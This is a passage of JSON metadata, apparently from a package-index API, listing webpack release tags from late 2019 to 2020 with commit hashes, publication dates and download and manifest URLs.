-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/r